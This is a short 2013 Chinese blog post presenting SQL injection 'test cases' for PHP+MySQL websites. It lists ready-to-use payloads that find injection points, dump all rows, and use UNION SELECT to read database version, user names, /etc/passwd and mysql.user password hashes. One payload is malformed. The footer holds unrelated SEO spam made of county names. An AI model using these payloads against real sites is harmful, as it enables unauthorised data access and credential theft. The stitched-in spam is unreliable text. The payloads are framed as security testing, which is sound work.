qileilove

          blog已經轉移至github,大家請訪問 http://qaseven.github.io/

          PHP+MySQL 網站 SQL 注入攻擊測試用例

          SQL注入攻擊測試用例

          說明

          Night
          Night’ and 1=1#
          Night’ and 1=2#

          判斷注入點。第一次是正常請求,如果存在注入漏洞,那么第二次請求得到結果應該與第一次一樣,并且第三次請求得到的結果應該與前兩次不同

          Night’ or 1=1#

          返回所有數據,常用于有搜索功能的頁面

          Night’ union select version()#

          返回數據庫版本信息

          Night’ union select database()#

          返回當前的庫名

          Night’ union select user()#

          返回數據庫的用戶名信息

          Night’ union select session_user()#

          Night’ union select system_user()#

          Night’ union select load_file(‘/etc/passwd’)#

          讀取系統文件

          Night’ select user ,password from mysql.user#

          返回數據庫用戶的密碼信息,密碼一般以MD5的方式存放

          posted on 2013-12-05 10:47 順其自然EVO 閱讀(302) 評論(0)  編輯  收藏


          只有注冊用戶登錄后才能發表評論。


          網站導航:
           
          <2013年12月>
          24252627282930
          1234567
          891011121314
          15161718192021
          22232425262728
          2930311234

          導航

          統計

          常用鏈接

          留言簿(55)

          隨筆分類

          隨筆檔案

          文章分類

          文章檔案

          搜索

          最新評論

          閱讀排行榜

          評論排行榜

          主站蜘蛛池模板: 南乐县| 塔城市| 二手房| 郓城县| 普陀区| 美姑县| 绥滨县| 沂水县| 黔东| 虹口区| 三门县| 拜泉县| 淅川县| 德江县| 普格县| 苍溪县| 柳州市| 唐河县| 正定县| 深水埗区| 安多县| 富顺县| 四子王旗| 卓尼县| 宝丰县| 林西县| 江油市| 五台县| 治县。| 铁岭市| 南丰县| 大关县| 磐石市| 新兴县| 台南县| 青河县| 临猗县| 清水河县| 黄浦区| 开封县| 永嘉县|